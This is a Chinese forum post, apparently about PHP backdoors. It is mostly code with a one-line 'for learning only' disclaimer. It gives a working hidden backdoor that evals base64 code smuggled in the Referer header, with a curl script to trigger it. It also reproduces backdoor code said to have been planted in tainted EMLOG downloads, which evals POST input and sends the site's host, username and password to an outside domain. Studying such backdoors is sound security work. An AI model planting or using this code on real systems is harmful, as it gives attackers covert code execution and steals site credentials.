一些常见的PHP后门原理分析
<p>本地测试结果如下图。 <br /><br />本程序只作为学习作用,请勿拿去做坏事。 <br /><br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode84"> <br /><?php <br />//1.php <br />header('Content-type:text/html;charset=utf-8'); <br />parse_str($_SERVER['HTTP_REFERER'], $a); <br />if(reset($a) == '10' && count($a) == 9) { <br />eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6))))); <br />}<?php <br />//2.php <br />header('Content-type:text/html;charset=utf-8'); <br />//要执行的代码 <br />$code = <<<CODE <br />phpinfo(); <br />CODE; <br />//进行base64编码 <br />$code = base64_encode($code); <br />//构造referer字符串 <br />$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i="; <br />//后门url <br />$url = 'http://localhost/test1/1.php'; <br />$ch = curl_init(); <br />$options = array( <br />CURLOPT_URL => $url, <br />CURLOPT_HEADER => FALSE, <br />CURLOPT_RETURNTRANSFER => TRUE, <br />CURLOPT_REFERER => $referer <br />); <br />curl_setopt_array($ch, $options); <br />echo curl_exec($ch); <br /></div><br /><br /><img src="https://img.jbzj.com/file_images/article/201403/20140320165788.jpg" alt="" /><br /><br />最近EMLOG源代码被污染,有些用户下载的出现了以下的后门代码 <br /><br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode85"> <br />if (isset($_GET["rsdsrv"])) { <br />if($_GET["rsdsrv"] == "20c6868249a44b0ab92146eac6211aeefcf68eec"){ <br />@preg_replace("//e",$_POST['IN_EMLOG'],"Unauthorization"); <br />} <br />} <br />file_get_contents("http://某域名/?url=".base64_encode($_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'])."&username=".base64_encode($username)."&password=".base64_encode($password)); <br /></div></p>
頁:
[1]